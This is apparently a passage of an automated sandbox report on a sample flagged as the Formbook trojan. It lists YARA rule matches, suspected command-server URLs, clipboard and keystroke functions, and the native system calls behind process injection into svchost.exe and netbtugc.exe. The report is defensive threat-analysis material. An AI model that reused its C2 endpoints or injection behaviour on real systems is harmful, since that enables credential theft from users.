gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59VEu%2BZzChuExk3ntbg%2BZZQJmj3sDro2l2wmeu5VJOzVY09u%2FUMh9fkslT%2F3cFFxeT1mdI6mdze%2BURssZatpXEyeKLHY8SVg7Ff98GW2ustNUOX8LrqXQnrmt6LFKb6BJAOqQhod02c4"}],"group":"cf-nel","maData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-Encodingx-frame-options: DENYx-request-id: 9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946server-timing: processing;dur=4content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a842b04-7650-448b-9163-2b6f6d30cec7-1714118946x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yJXvL8upT5JCSe5s8exfmyghNWtA7%2FiUuhobNIaMv04GJhTPS1xqt8yPzB4xom0uHDQmSBI1Tmospgq22s78398G8gPRbonhH6EH99axbz9KWjzymtkfwtL1uNi%2BydT7RKRbgE8B%2Bmbr"}],"group":"cf-nel","max_ageData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 08:09:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1X-Storefront-Renderer-Rendered: 1Vary: Accept-Encodingvary: Acceptx-frame-options: DENYcontent-security-policy: frame-ancestors 'none';x-shopid: x-shardid: -1powered-by: Shopifyserver-timing: processing;dur=6;desc="gc:1", asn;desc="174", edge;desc="MIA", country;desc="US", pageType;desc="404", servedBy;desc="kvn6", requestID;desc="d9ddf08f-c24f-46c0-9267-ccec356d2009-1714118949"x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1x-request-id: d9ddf08f-c24f-46c0-9267-ccec356d2009-1714118949CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0o65ni8lbvPNAsqB6LSetk6XT7862%2FFWykLyldTj%2BvyGqj7PmmgdOcoYaGPhwuAaWtgH6oxMFg%2FEsw3iiFhR%2BDH5tEyBI4BDrTQFuB48gjgEG1KRGrYRlh%2FgVY8gJdFMbOsEodGqstnX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=65.000057X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 87a516c9887a8daf-MIAalt-svc: hData Raw: Data Ascii:
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3919213991.0000000005440000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.empowermedeco.com
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3919213991.0000000005440000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.empowermedeco.com/fo8o/
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://accounts.shopify.com/recovery/stores?utm_source=gurucopy&utm_medium=link&utm_campaign=Gurus
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Medium.woff2?v=1674610916
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.shopify.com/s/files/1/0458/4836/3030/files/ShopifySans-Regular.woff2?v=1674610915
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004782000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003E72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004782000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003E72000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C36000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 00000004.00000003.1766426903.0000000007C86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 00000004.00000002.3910307845.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 00000004.00000002.3918311897.000000000413A000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.000000000382A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 00000004.00000002.3918311897.000000000413A000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.000000000382A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004C38000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004328000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004DCA000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.00000000044BA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4ds
Source: netbtugc.exe, 00000004.00000003.1770117274.0000000007CAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 00000004.00000002.3918311897.000000000445E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3919879829.0000000006260000.00000004.00000800.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003B4E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000003B4E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.shopify.com/?utm_source=ExpiredDomainLink&utm_medium=textlink&utm_campaign=breadcrumb
Source: netbtugc.exe, 00000004.00000002.3918311897.0000000004AA6000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000002.3917883914.0000000004196000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.shopify.com/admin/settings/domains
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C3425A
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C34458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00C34458
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00C3425A
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00C20219
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_00C4CDAC

E-Banking Fraud

barindex
Source: Yara match File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: This is a third-party compiled AutoIt script. 0_2_00BC3B4C
Source: 150-425-2024.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 150-425-2024.exe, 00000000.00000000.1431945783.0000000000C75000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9612cf0c-2
Source: 150-425-2024.exe, 00000000.00000000.1431945783.0000000000C75000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4e713a88-c
Source: 150-425-2024.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2c7ef970-c
Source: 150-425-2024.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_08ea8ab0-3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0062B363 NtClose, 2_2_0062B363
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00601D09 NtProtectVirtualMemory, 2_2_00601D09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272B60 NtClose,LdrInitializeThunk, 2_2_03272B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03272DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk, 2_2_032735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03274340 NtSetContextThread, 2_2_03274340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03274650 NtSuspendThread, 2_2_03274650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272BA0 NtEnumerateValueKey, 2_2_03272BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272B80 NtQueryInformationFile, 2_2_03272B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272BE0 NtQueryValueKey, 2_2_03272BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272BF0 NtAllocateVirtualMemory, 2_2_03272BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272AB0 NtWaitForSingleObject, 2_2_03272AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272AF0 NtWriteFile, 2_2_03272AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272AD0 NtReadFile, 2_2_03272AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272F30 NtCreateSection, 2_2_03272F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272F60 NtCreateProcessEx, 2_2_03272F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272FA0 NtQuerySection, 2_2_03272FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272FB0 NtResumeThread, 2_2_03272FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272F90 NtProtectVirtualMemory, 2_2_03272F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272FE0 NtCreateFile, 2_2_03272FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272E30 NtWriteVirtualMemory, 2_2_03272E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272EA0 NtAdjustPrivilegesToken, 2_2_03272EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272E80 NtReadVirtualMemory, 2_2_03272E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272EE0 NtQueueApcThread, 2_2_03272EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272D30 NtUnmapViewOfSection, 2_2_03272D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272D00 NtSetInformationFile, 2_2_03272D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272D10 NtMapViewOfSection, 2_2_03272D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272DB0 NtEnumerateKey, 2_2_03272DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272DD0 NtDelayExecution, 2_2_03272DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272C00 NtQueryInformationProcess, 2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272C60 NtCreateKey, 2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272CA0 NtQueryInformationToken, 2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272CF0 NtOpenProcess, 2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03272CC0 NtQueryVirtualMemory, 2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03273010 NtOpenDirectoryObject, 2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03273090 NtSetValueKey, 2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_032739B0 NtGetContextThread, 2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03273D10 NtOpenProcessToken, 2_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03273D70 NtOpenThread, 2_2_03273D70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E4340 NtSetContextThread,LdrInitializeThunk, 4_2_032E4340
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E4650 NtSuspendThread,LdrInitializeThunk, 4_2_032E4650
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2B60 NtClose,LdrInitializeThunk, 4_2_032E2B60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2BA0 NtEnumerateValueKey,LdrInitializeThunk, 4_2_032E2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2BE0 NtQueryValueKey,LdrInitializeThunk, 4_2_032E2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_032E2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2AF0 NtWriteFile,LdrInitializeThunk, 4_2_032E2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2AD0 NtReadFile,LdrInitializeThunk, 4_2_032E2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2F30 NtCreateSection,LdrInitializeThunk, 4_2_032E2F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2FB0 NtResumeThread,LdrInitializeThunk, 4_2_032E2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2FE0 NtCreateFile,LdrInitializeThunk, 4_2_032E2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2E80 NtReadVirtualMemory,LdrInitializeThunk, 4_2_032E2E80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2EE0 NtQueueApcThread,LdrInitializeThunk, 4_2_032E2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_032E2D30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_032E2D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_032E2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2DD0 NtDelayExecution,LdrInitializeThunk, 4_2_032E2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2C60 NtCreateKey,LdrInitializeThunk, 4_2_032E2C60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_032E2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_032E2C70
